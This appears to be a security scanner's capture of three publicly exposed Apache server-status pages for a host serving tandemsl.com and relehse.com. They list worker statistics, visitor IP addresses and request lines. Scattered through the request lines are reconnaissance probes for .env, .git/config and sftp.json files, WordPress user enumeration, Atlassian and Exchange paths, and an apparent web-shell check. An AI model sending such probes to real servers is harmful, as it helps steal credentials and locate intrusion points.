134.122.63.192http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /?rest_route=/wp/v2/users/ HTTP/1.1 0-2632703290/1364/57717_ 172.268310165308430.016.081180.14 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1677711342.64984703063964843750 0-2632703290/1574/58113_ 172.07831069678240.018.041129.90 181.115.167.50h2tandemsl.com:443idle, streams: 0/49/49/0/0 (open/recv/resp/push/rst) 0-2632703290/1387/61682_ 172.061206593232840.022.291169.40 181.115.167.50h2tandemsl.com:443idle, streams: 0/43/43/0/0 (open/recv/resp/push/rst) 0-2632703290/1228/60827_ 172.080088879100.019.031166.98 134.122.63.192http/1.1 0-2632703290/1571/59884_ 172.0701284498790.023.601186.54 134.122.63.192h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-2632703290/1451/59087_ 172.0612030105019800.026.121121.22 181.115.167.50h2tandemsl.com:443done, streams: 0/54/54/0/0 (open/recv/resp/push/rst) 1-2635428550/728/55080_ 32.0000176976730.015.61971.94 134.122.63.192h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-2635428550/733/55423_ 32.0000166911340.016.481031.69 88.26.203.137h2tandemsl.com:443idle, streams: 0/48/48/0/0 (open/recv/resp/push/rst) 1-2635428550/719/55045_ 31.4900103337450.024.161114.27 134.122.63.192http/1.1 1-2635428550/775/55071_ 32.0500107273800.015.59995.89 134.122.63.192http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 1-2635428550/706/54035R 31.9457167617950.030.641032.39 88.26.203.137h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-2635428550/795/54360_ 32.0239727286833410.018.45963.73 72.14.201.207http/1.1tandemsl.com:443GET /seguridad-industrial-blog/metodo-mosler-analisis-riesgo/ H 1-2635428550/706/54857_ 32.03230129150770.017.851018.07 31.4.203.12h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-2635428550/737/55804_ 32.040178530220.014.25975.18 134.122.63.192http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcHELP 1-2635428550/954/56593_ 32.000096355680.012.211051.04 88.26.203.137h2tandemsl.com:443idle, streams: 0/50/50/0/0 (open/recv/resp/push/rst) 1-2635428550/801/56279_ 31.99200116652280.027.891062.48 88.26.203.137h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-2635401820/654/77170_ 29.491630136169090.017.811431.81 73.4.221.223h2tandemsl.com:443done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-2635401820/488/78460R 29.54512693125664240.08.251541.85 73.4.221.223h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-2635401820/565/78128_ 28.552100107313180.014.001579.99 201.175.234.49h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-2635401820/607/75768_ 29.2416319997490550.014.891508.30 192.236.193.183http/1.1tandemsl.com:443GET //wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282 HT 2-2635401820/510/77499_ 28.55163998112843180.08.421620.38 200.68.170.83h2done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-2635401820/637/76522_ 28.5600113042800.015.331464.05 134.122.63.192http/1.1 2-2635401820/472/76899_ 29.42163195100975090.05.741430.42 139.28.218.235h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-2635401820/847/76741_ 28.58509229112959330.020.901575.69 186.2.94.165h2done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-2635401820/643/76560_ 29.355090112367880.012.351594.21 54.36.149.95h2tandemsl.com:443local goaway, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-2635401820/613/74955_ 28.56231109063850.014.781501.75 31.4.203.12h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-2635575310/346/45482_ 14.3547073698210.04.45836.95 31.4.203.12h2tandemsl.com:443idle, streams: 0/49/49/0/0 (open/recv/resp/push/rst) 3-2635575310/339/45969_ 14.3242071942920.07.76862.35 31.4.203.12h2tandemsl.com:443idle, streams: 0/22/22/0/0 (open/recv/resp/push/rst) 3-2635575310/465/47119R 14.3547059325440.08.99877.72 31.4.203.12h2tandemsl.com:443idle, streams: 0/46/46/0/0 (open/recv/resp/push/rst) 3-2635575310/329/45650_ 14.3242072468690.012.20887.53 31.4.203.12h2tandemsl.com:443done, streams: 0/51/51/0/0 (open/recv/resp/push/rst) 3-2635575310/267/45464_ 14.3800165439070.013.84859.85 134.122.63.192http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-2635575310/395/46627_ 14.3545062527800.08.35842.42 31.4.203.12h2tandemsl.com:443idle, streams: 0/51/51/0/0 (open/recv/resp/push/rst) 3-2635575310/292/44427_ 14.354625356521730.010.01833.72 31.4.203.12h2tandemsl.com:443idle, streams: 0/50/50/0/0 (open/recv/resp/push/rst) 3-2635575310/399/45758R 14.35470118604490.022.62854.65 31.4.203.12h2tandemsl.com:443idle, streams: 0/47/47/0/0 (open/recv/resp/push/rst) 3-2635575310/328/45152R 14.2847092479310.015.74866.93 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1677712109.81678509712219238281 3-2635575310/359/46628W 14.350085856830.04.93840.44 134.122.63.192http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 4-2632703270/1172/60959_ 162.52823485356760.022.751135.74 66.249.66.11http/1.1 4-2632703270/1417/59912_ 162.540070298680.017.851103.25 134.122.63.192h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-2632703270/1177/62596_ 163.720085167350.019.541132.09 134.122.63.192http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 4-2632703270/1319/61247R 162.50874082800570.016.911070.87 181.188.215.26h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-2632703270/1286/62223_ 162.540090588640.033.981156.25 134.122.63.192h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-2632703270/1232/61016_ 163.720076445400.0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a85802ca5eefe7
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Mar 24 2022 17:33:25 Current Time: Wednesday, 22-Feb-2023 15:29:01 CET Restart Time: Saturday, 07-Jan-2023 18:56:40 CET Parent Server Config. Generation: 23 Parent Server MPM Generation: 22 Server uptime: 45 days 20 hours 32 minutes 21 seconds Server load: 0.25 0.20 0.18 Total accesses: 2609640 - Total Traffic: 47.5 GB - Total Duration: 425471876 CPU Usage: u559.19 s442.89 cu7807.81 cs5163.16 - .353% CPU load .659 requests/sec - 12.6 kB/second - 19.1 kB/request - 163.039 ms/request 6 requests currently being processed, 44 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02944093no1yes37000 12734032no1yes37000 22922488no2yes010000 32734031no0yes010000 42734030no0yes010000 Sum504 644000 _WR______R_R___WR_________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-2229440930/2287/53752_ 93.8624105974479480.031.58973.24 65.21.206.43h2tandemsl.com:443done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-2229440930/1915/54028W 94.080061786940.051.091025.93 172.104.176.248http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /info.php HTTP/1.1 0-2229440930/2010/53321R 94.0532078539010.049.80977.75 172.104.176.248http/1.1 0-2229440930/1988/52147_ 94.100063857230.059.341028.90 172.104.176.248http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-2229440930/1848/51107_ 94.1000155228780.046.901049.84 172.104.176.248http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 0-2229440930/2032/51575_ 93.972146361162280.087.121016.80 172.104.176.248h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-2229440930/2026/55383_ 94.071082867830.057.801040.58 172.104.176.248http/1.1 0-2229440930/1966/54437_ 94.100072928280.053.631025.03 172.104.176.248http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 0-2229440930/2020/53016_ 94.1000272420840.065.441065.00 172.104.176.248http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 0-2229440930/1955/52517R 94.0335094782160.046.23969.24 172.104.176.248http/1.1 1-2227340320/3945/44347_ 213.1400161015770.063.52774.69 172.104.176.248http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-2227340320/4091/45259R 212.96203225150405080.062.85804.40 51.178.207.154h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-2227340320/3821/44550_ 212.6724085841570.077.78885.42 190.57.184.129h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-2227340320/3693/44540_ 212.79382182901980.074.38792.36 40.77.190.88h2done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-2227340320/3577/43305_ 212.61026849340620.089.37805.27 172.104.176.248h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-2227340320/3175/43326W 212.410059993780.063.42733.61 172.104.176.248http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-2227340320/3807/43680R 212.41211062495530.066.83798.04 195.77.156.70h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-2227340320/3981/45217_ 212.858462261175900.063.39778.90 181.49.9.80h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-2227340320/4087/45422_ 212.6138077088810.077.38809.23 40.77.190.88h2done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-2227340320/3860/45535_ 213.12413191005440.069.61832.24 83.48.75.2h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-2229224880/2416/62720_ 119.34292599690130.056.321116.13 172.104.176.248h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-2229224880/2871/64394_ 119.290244100214360.062.901266.30 172.104.176.248http/1.1 2-2229224880/2461/64341_ 119.373184121540.073.241267.48 172.104.176.248http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcHELP 2-2229224880/2452/61491_ 119.37754675047220.060.171204.00 52.167.144.34h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-2229224880/2338/63434_ 119.328087134160.079.371310.84 40.77.167.242h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-2229224880/2745/62218_ 119.3512383007240.053.161153.29 172.104.176.248h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-2229224880/2733/63131_ 119.301073466560.079.131147.65 172.104.176.248http/1.1 2-2229224880/2714/62636_ 119.293090968760.055.761218.79 181.49.9.80h2tandemsl.com:443idle, streams: 0/51/51/0/0 (open/recv/resp/push/rst) 2-2229224880/2510/62525_ 119.302082134070.097.451273.49 172.104.176.248h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-2229224880/2679/61648_ 119.290086621170.080.111210.52 172.104.176.248http/1.1 3-2227340310/1447/40780_ 156.3729059957869030.024.08753.85 66.249.66.81http/1.1tandemsl.com:443GET /wp-content/uploads/2019/09/Compresed-v1.mp4 HTTP/1.1 3-2227340310/1333/41133_ 156.33307048854790.046.17774.63 66.249.66.11http/1.1tandemsl.com:443GET /wp-includes/js/dist/hooks.min.js?ver=4169d3cf8e8d95a3d6d5 3-2227340310/1491/42077_ 155.864093547462110.033.59756.79 186.80.28.20h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-2227340310/1536/40584_ 156.30308054593940.031.64761.25 189.195.156.182h2tandemsl.com:443idle, streams: 0/8/8/0/0 (open/recv/resp/push/rst) 3-2227340310/1432/40820_ 155.773081149062600.031.64740.11 40.77.167.239h2relehse.com:443done, streams: 0/8/8/0/0 (open/recv/resp/push/rst) 3-2227340310/1539/41494_ 156.3531120351273520.030.67750.32 190.57.184.129h2tandemsl.com:443idle, streams: 0/31/30/0/1 (open/recv/resp/push/rst) 3-2227340310/1490/39936_ 155.2130897148588520.022.79732.50 13.80.183.173http/1.1tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-2227340310/1541/41006_ 156.3531118107001220.023.54733.57 83.48.75.2h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-2227340310/1341/40326_ 156.012872072523300.022.18736.18 66.249.66.81http/1.1 3-2227340310/1473/41866_ 156.35308063863740.020.78753.98 190.57.184.129http/1.1tandemsl.com:443GET /wp-json/contact-form-7/v1/contact-forms/2215/feedback/sche 4-2227340300/1662/58568_ 166.06315079830050.038.921085.47 66.249.66.38http/1.1tandemsl.com:443GET /wp-content/uploads/elementor/css/post-11.css?ver=167334095 4-2227340300/1799/57504_ 165.8383124465872950.039.951073.02 65.108.78.33http/1.1tandemsl.com:443GET /robots.txt HTTP/1.1 4-2227340300/1753/60399_ 165.262080174160.040.361094.13 172.104.176.248http/1.1 4-2227340300/1856/58647_ 165.583132378445600.034.451034.36 66.249.66.38http/1.1 4-2227340300/1862/59901_ 166.180186155100.046.551092.76 172.104.176.248http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /?rest_route=/wp/v2/users/ HTTP/1.1 4-2227340300/1914/58630_ 165.73518171534570.051.161120.00 40.77.190.88h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-2227340300/2311/61060</
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a858029152bb11
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Mar 24 2022 17:33:25 Current Time: Monday, 20-Feb-2023 16:07:01 CET Restart Time: Saturday, 07-Jan-2023 18:56:40 CET Parent Server Config. Generation: 23 Parent Server MPM Generation: 22 Server uptime: 43 days 21 hours 10 minutes 21 seconds Server load: 0.00 0.06 0.07 Total accesses: 2471451 - Total Traffic: 44.6 GB - Total Duration: 403264271 CPU Usage: u337.96 s324.23 cu7562.94 cs5021.32 - .349% CPU load .652 requests/sec - 12.3 kB/second - 18.9 kB/request - 163.169 ms/request 8 requests currently being processed, 42 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02734164no1yes19000 12734032no0yes010000 22734033no0yes010000 32734031no0yes64000 42734030no1yes19000 Sum502 842000 ___W__________________________RRRR___W_R_R________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-2227341640/3549/50338_ 120.480069641220.065.15914.88 134.122.110.201http/1.1 0-2227341640/3536/50602_ 120.610055770990.085.35944.44 134.122.110.201http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.DS_Store HTTP/1.1 0-2227341640/3526/50010_ 120.5294273812380.069.62897.21 185.175.63.3h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-2227341640/2982/48478_ 120.610058561870.070.92942.39 134.122.110.201http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 0-2227341640/2887/47684_ 120.6101147446890.063.02978.51 134.122.110.201http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-2227341640/2966/48364_ 120.610056439480.081.12902.89 134.122.110.201http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-2227341640/3264/51923_ 120.5604877449510.059.22952.64 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-2227341640/3483/50823_ 120.479067844730.056.79945.19 2.136.78.3h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-2227341640/3513/49574_ 120.6001267691860.059.38976.50 134.122.110.201http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcHELP 0-2227341640/2966/48944_ 120.59122089267070.068.21894.68 185.175.63.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-2227340320/359/40761_ 59.818920155972940.06.15717.31 79.154.216.143h2tandemsl.com:443done, streams: 0/54/54/0/0 (open/recv/resp/push/rst) 1-2227340320/472/41640_ 59.82820146673890.06.06747.61 79.154.216.143h2tandemsl.com:443idle, streams: 0/52/52/0/0 (open/recv/resp/push/rst) 1-2227340320/343/41072_ 59.8284181883250.08.55816.19 79.154.216.143h2tandemsl.com:443idle, streams: 0/50/50/0/0 (open/recv/resp/push/rst) 1-2227340320/328/41175_ 59.82144078583770.08.55726.53 213.229.155.142h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-2227340320/481/40209_ 59.820044957740.013.11729.00 134.122.110.201h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-2227340320/324/40475_ 59.818925456517940.05.88676.07 79.154.216.143h2tandemsl.com:443idle, streams: 0/45/45/0/0 (open/recv/resp/push/rst) 1-2227340320/350/40223_ 59.82895058943390.08.46739.67 79.154.216.143h2tandemsl.com:443idle, streams: 0/54/54/0/0 (open/recv/resp/push/rst) 1-2227340320/429/41665_ 60.14854956601290.03.69719.20 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-2227340320/394/41729_ 59.8282063344230.09.12740.97 79.154.216.143h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-2227340320/475/42150_ 59.8284086829060.05.81768.43 79.154.216.143h2tandemsl.com:443done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-2227340330/2741/58194_ 107.8402993073690.042.511017.03 134.122.110.201h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-2227340330/2562/58946_ 107.8702080935040.072.811155.19 134.122.110.201http/1.1 2-2227340330/2505/59387_ 107.7039316576756980.086.591158.55 66.249.66.38http/1.1tandemsl.com:443local goaway, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-2227340330/2329/56950_ 107.690068631030.068.461105.45 134.122.110.201h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-2227340330/3176/58830_ 107.8602480754900.085.621173.81 134.122.110.201h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-2227340330/2760/57032_ 107.570075955370.063.881067.50 134.122.110.201http/1.1 2-2227340330/2881/58156_ 107.75447267048710.056.421025.15 201.175.218.246h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-2227340330/2602/57128_ 107.89423484566870.062.371117.91 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-2227340330/2471/57634_ 107.75098874986540.048.171113.22 134.122.110.201http/1.1 2-2227340330/2768/56281_ 107.76098180581450.084.221080.05 134.122.110.201http/1.1 3-2227340310/625/39958R 62.342634356785720.08.57738.34 134.122.110.201http/1.1 3-2227340310/514/40314R 61.51375047398090.011.08739.54 134.122.110.201http/1.1 3-2227340310/702/41288R 62.39144046616800.017.52740.73 134.122.110.201http/1.1 3-2227340310/591/39639R 62.04260153563110.018.37747.97 134.122.110.201http/1.1 3-2227340310/657/40045_ 62.241410147455850.010.70719.17 155.190.46.7http/1.1tandemsl.com:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 3-2227340310/551/40506_ 61.761411849749410.06.45726.11 163.116.169.119http/1.1 3-2227340310/523/38969_ 62.040447282640.06.25715.97 134.122.110.201h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-2227340310/577/40042W 61.5900105867570.07.96717.99 134.122.110.201http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-2227340310/632/39617_ 62.460071523790.010.62724.62 134.122.110.201http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.env HTTP/1.1 3-2227340310/574/40967R 62.04260062867660.08.57741.78 134.122.110.201http/1.1 4-2227340300/686/57592_ 69.0621078370320.021.101067.65 155.190.46.7http/1.1tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-2227340300/835/56540R 69.05267063826250.022.631055.70 134.122.110.201http/1.1 4-2227340300/693/59339_ 68.72146078851990.012.361066.12 163.116.169.119http/1.1tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-2227340300/774/57565_ 69.1721077010150.020.811020.72 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1676905354.43583703041076660156 4-2227340300/913/58952_ 69.211633484504750.026.221072.43 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-2227340300/1059/57775_ 69.131463369820500.022.161091.00 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-2227340300/680/59429_ 69.27243966881670.026.151067.03 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a858021e68958a
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Mar 24 2022 17:33:25 Current Time: Friday, 10-Feb-2023 12:46:32 CET Restart Time: Saturday, 07-Jan-2023 18:56:40 CET Parent Server Config. Generation: 18 Parent Server MPM Generation: 17 Server uptime: 33 days 17 hours 49 minutes 52 seconds Server load: 0.48 0.46 0.46 Total accesses: 1888025 - Total Traffic: 32.4 GB - Total Duration: 295550289 CPU Usage: u418.6 s337.72 cu5512.12 cs3735.36 - .343% CPU load .648 requests/sec - 11.7 kB/second - 18.0 kB/request - 156.539 ms/request 9 requests currently being processed, 41 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01657404no1yes010100 12070141no1yes010000 22070297no1yes46000 32035836no1yes28000 41817387no0yes37000 Sum504 941100 ____________________R_R__RR_____W____R_____W_RR___ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-1716574040/3290/29833_ 252.16382142305060.047.28520.48 165.225.93.37http/1.1 0-1716574040/2631/29922_ 252.4241029819640.045.27488.00 165.225.93.37http/1.1tandemsl.com:443GET /wp-content/uploads/2019/11/GHS01-150x150.gif HTTP/1.1 0-1716574040/3296/29153_ 252.4225748699320.053.18524.48 217.124.241.254h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-1716574040/2667/28696_ 252.4215032639920.050.62541.63 172.70.152.69http/1.1 0-1716574040/2663/28131_ 252.41380115580690.062.57530.27 165.225.93.37http/1.1tandemsl.com:443GET /wp-content/plugins/sitepress-multilingual-cms/templates/la 0-1716574040/2553/28684_ 252.420033101130.068.48520.46 164.92.179.10h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-1716574040/3237/30143_ 252.4241031862490.051.97546.44 165.225.93.37http/1.1tandemsl.com:443GET /wp-content/plugins/elementor-pro/assets/lib/sticky/jquery. 0-1716574040/2676/29519_ 252.4241034346710.070.85513.89 165.225.93.37http/1.1tandemsl.com:443GET /wp-content/uploads/2020/06/arrow-white.png HTTP/1.1 0-1716574040/2889/28656_ 252.4217074143110.051.95534.68 172.68.41.7http/1.1 0-1716574040/2924/28056_ 252.420153860510.061.53494.53 164.92.179.10http/1.1 1-1720701410/1347/32055_ 35.38230133909920.012.82535.95 165.225.93.37http/1.1tandemsl.com:443done, streams: 0/47/47/0/0 (open/recv/resp/push/rst) 1-1720701410/1230/33298_ 35.4017079332530.023.01558.44 172.68.41.7http/1.1 1-1720701410/1379/32859_ 35.4015066009370.017.65608.32 172.70.152.69http/1.1 1-1720701410/1626/32944_ 35.3817067213290.012.77531.25 172.68.41.7http/1.1 1-1720701410/1253/32168_ 35.370133445650.016.91528.31 164.92.179.10h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-1720701410/1243/32591_ 35.420045324320.010.45506.12 164.92.179.10http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.DS_Store HTTP/1.1 1-1720701410/1510/31929_ 35.38141947668160.021.96542.95 172.69.47.71http/1.1 1-1720701410/1212/33166_ 35.392313941664560.010.09522.99 2.136.78.3h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-1720701410/1584/33134_ 35.3725035506690.013.24558.87 165.225.93.37http/1.1tandemsl.com:443GET /wp-content/uploads/elementor/css/post-3037.css?ver=1673340 1-1720701410/1340/33220_ 35.3825076067030.013.18568.68 165.225.93.37http/1.1tandemsl.com:443GET /wp-content/uploads/elementor/css/post-1012.css?ver=1673341 2-1720702970/1847/37021R 47.937059064930.032.36596.12 164.92.179.10http/1.1 2-1720702970/1835/37720_ 47.9441656292030.020.68693.18 62.22.48.48http/1.1relehse.com:443GET /admin/getNotifications HTTP/1.1 2-1720702970/2008/37802R 47.906052048120.026.46654.43 80.32.117.189h2tandemsl.com:443idle, streams: 0/19/19/0/0 (open/recv/resp/push/rst) 2-1720702970/1578/36678_ 47.911040312930.020.74634.78 80.32.117.189h2tandemsl.com:443idle, streams: 0/45/45/0/0 (open/recv/resp/push/rst) 2-1720702970/1802/36637_ 47.9307044733520.027.08663.44 164.92.179.10h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-1720702970/2113/35888R 47.907050231060.032.95573.96 80.32.117.189h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-1720702970/1919/36865R 47.916037374520.024.45565.88 80.32.117.189h2tandemsl.com:443done, streams: 0/63/63/0/2 (open/recv/resp/push/rst) 2-1720702970/1669/35446_ 47.910057975800.023.76659.06 164.92.179.10http/1.1 2-1720702970/1853/36745_ 47.911042485520.025.48635.39 80.32.117.189h2tandemsl.com:443idle, streams: 0/54/54/0/0 (open/recv/resp/push/rst) 2-1720702970/1851/35294_ 47.910052607530.028.70603.07 164.92.179.10http/1.1 3-1720358360/1822/36063_ 65.320049948250.025.68649.79 164.92.179.10http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-1720358360/1607/36228_ 65.3212941885120.032.27666.01 2.136.78.3h2relehse.com:443idle, streams: 0/55/55/0/0 (open/recv/resp/push/rst) 3-1720358360/1724/37098W 65.110041240700.027.73633.97 164.92.179.10http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-1720358360/1549/35624_ 65.32128448168430.034.12658.93 2.136.78.3h2relehse.com:443idle, streams: 0/54/54/0/0 (open/recv/resp/push/rst) 3-1720358360/1929/36050_ 65.11033142095940.031.13633.29 164.92.179.10http/1.1 3-1720358360/1672/36282_ 65.1122544444550.031.08642.20 2.136.78.3h2relehse.com:443idle, streams: 0/46/46/0/0 (open/recv/resp/push/rst) 3-1720358360/1678/35263_ 65.31235241789580.036.68634.72 2.136.78.3h2relehse.com:443idle, streams: 0/52/52/0/0 (open/recv/resp/push/rst) 3-1720358360/1528/36072R 65.10338799451080.028.49640.43 2.136.78.3h2relehse.com:443idle, streams: 0/38/38/0/0 (open/recv/resp/push/rst) 3-1720358360/1941/35636_ 65.1002160289360.031.47627.16 2.136.78.3h2relehse.com:443idle, streams: 0/42/42/0/0 (open/recv/resp/push/rst) 3-1720358360/1557/37114_ 65.320057475160.029.87651.64 164.92.179.10http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcHELP 4-1718173870/2167/53562_ 171.2815072857410.038.22992.70 165.225.93.37http/1.1tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-1718173870/2411/52678_ 171.310059458320.033.70988.37 164.92.179.10http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 4-1718173870/2256/54916_ 171.2715072156860.029.53987.31 172.70.152.69http/1.1 4-1718173870/2257/53600_ 171.310071865890.028.32941.14 164.92.179.10http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 4-1718173870/2118/54817_ 171.280079299280.039.67979.10 164.92.179.10h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-1718173870/2265/53765R 171.281523965019170.040.591022.57 165.225.93.37http/1.1tandemsl.com:443GET /wp-json/contact-form-7/v1/contact-forms/2215/feedback/sche 4-1718173870/1952/55298R 171.29163562134850.028.79969.72 2.136.78.3h2relehse.com:443idle, streams: 